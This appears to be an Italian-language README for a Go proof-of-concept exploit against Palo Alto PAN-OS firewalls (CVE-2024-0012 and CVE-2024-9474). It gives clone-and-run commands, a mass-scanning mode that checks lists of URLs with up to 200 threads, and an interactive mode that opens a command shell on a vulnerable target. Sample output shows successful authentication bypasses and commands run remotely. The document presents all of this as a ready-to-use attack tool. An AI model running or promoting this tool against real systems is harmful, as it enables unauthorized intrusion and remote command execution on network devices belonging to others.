
Vulnerabilità RCE Palo Alto
Questo script è un exploit Proof of Concept (PoC) per le vulnerabilità presenti in Palo Alto PAN-OS (CVE-2024-0012 e CVE-2024-9474). Lo script può essere utilizzato sia per scansionare un elenco di URL alla ricerca della vulnerabilità, sia per sfruttare interattivamente un singolo URL vulnerabile.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: Barra di avanzamento per visualizzare lo stato della scansione. github.com/gookit/color: Supporto avanzato per i colori nell'output della console. github.com/manifoldco/promptui: Prompt interattivi da riga di comando. github.com/p0dalirius/goopts/parser: Parsing degli argomenti da riga di comando.
Esecuzione in Modalità di Scansione (per scansionare più URL) La Modalità di Scansione viene utilizzata per verificare più URL per la vulnerabilità. Devi fornire un file contenente un elenco di URL.
go run main.go --file urls.txt --output results.txt --threads 100
--file: Percorso di un file contenente un elenco di URL da scansionare. --output: Percorso in cui salvare i risultati della scansione (default: output.txt). --threads: Numero di thread concorrenti da utilizzare per la scansione (default: 200).
http://example1.com
http://example2.com
Esecuzione in Modalità di Exploit (per sfruttare interattivamente un singolo URL)
go run main.go --url http://target.com --output results.txt
--url: L'URL di destinazione da sfruttare. --output: Percorso in cui salvare i risultati dell'exploit. Una volta in Modalità di Exploit, puoi inserire i comandi da eseguire sul sistema di destinazione. Digita exit per uscire dalla shell interattiva.
Per visualizzare le informazioni di aiuto:
go run main.go --help
Al termine della scansione, i risultati verranno salvati nel file di output specificato (ad es. results.txt):
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
Quando si sfrutta un URL in modalità interattiva, l'output dei comandi viene mostrato dopo l'esecuzione sul target:
# ls /var
bin app lib tmp
# exit
[+] Exiting interactive shell.
Argomenti della riga di comando Flag Descrizione Valore predefinito --url L'URL da sfruttare in Modalità di Exploit --file File con gli URL da scansionare (usato in Modalità di Scansione) --output File di output per salvare i risultati output.txt --threads Numero di thread concorrenti per la scansione (Modalità di Scansione) 200 --help Mostra il messaggio di aiuto
Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.